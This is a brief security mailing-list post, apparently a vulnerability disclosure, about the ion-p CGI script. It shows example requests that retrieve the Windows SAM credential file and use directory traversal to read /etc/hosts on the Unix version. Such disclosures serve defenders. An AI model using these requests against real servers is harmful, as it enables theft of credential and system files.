Hi, > ion-p.exe allows Remote File Retrieving > > www.Server.com/cgi-bin/ion-p.exe?page=c:\winnt\repair\sam >
The 'ion-p' *NIX version is also vulnerable. Directory traversal chars can be used, too: /cgi-bin/ion-p?page=../../../../../etc/hosts Bye, Stuart -- Stuart Moore SecurityTracker.com SecurityGlobal.net LLC
